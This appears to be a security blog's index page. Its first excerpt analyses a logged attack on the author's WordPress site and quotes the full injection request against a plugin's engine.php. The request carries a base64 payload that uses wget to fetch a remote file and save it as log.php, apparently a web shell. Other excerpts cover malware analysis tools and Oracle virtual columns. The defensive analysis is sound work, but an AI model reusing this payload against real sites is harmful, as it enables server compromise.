Automated or manual attack?
Today I received a notification about an automated attack against this blog. Nothing new, however, I was curious about how it exactly works and decided to take a brief look to the attack to answer various questions:
- What vulnerability is this exploiting? Am I vulnerable?
- What does the payload?
- Is this an automated attack or a manually launched one?
The attack in the logs
Since I installed mute screamer plugin for WordPress I receive regularly attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following line appears:
/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));
So, this is an exploit for a PHP code injection vulnerability in "engine.php". A quick search of the vulnerability revealed this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don't have this plugin installed so I already answered the first 2 questions. Time to answer the next one: what the payload does?
Zerowine 2.0 preview
Hi!
I plan to release in a month or so the newest version of ZeroWine focused on automation. This new version consists in the following components:
- A modified version of Wine 1.10.
- One XMLRPC Server.
- One XMLRPC client tool.
Dangers of Oracle Virtual Columns
Virtual Columns is a new feature of Oracle 11g. This feature allows to create table columns based on PL/SQL functions. While it's useful it can be dangerous too.
MyNav, a python plugin for IDA Pro
MyNav is an Open Source IDAPython plugin for the commercial disassembler IDA Pro to be released on July 2010. The plugin adds a lot of new features only available in other products like in the well known Zynamics BinNavi or HB Gary's Inspector. In this blog post I will show you some of the features available in the current version with some examples.
A typical work day with DeepToad
Sometimes, I receive so many malware samples that it turns out to be imposible (or at least inhuman) to analyze all the samples by hand and I need to automate the typical (boring) tasks: Clusterization of the samples in smaller sets and initial (and superficial) analysis of the different samples. For the first task I created DeepToad, a tool to clusterize any kind of file using fuzzy hashing techniques.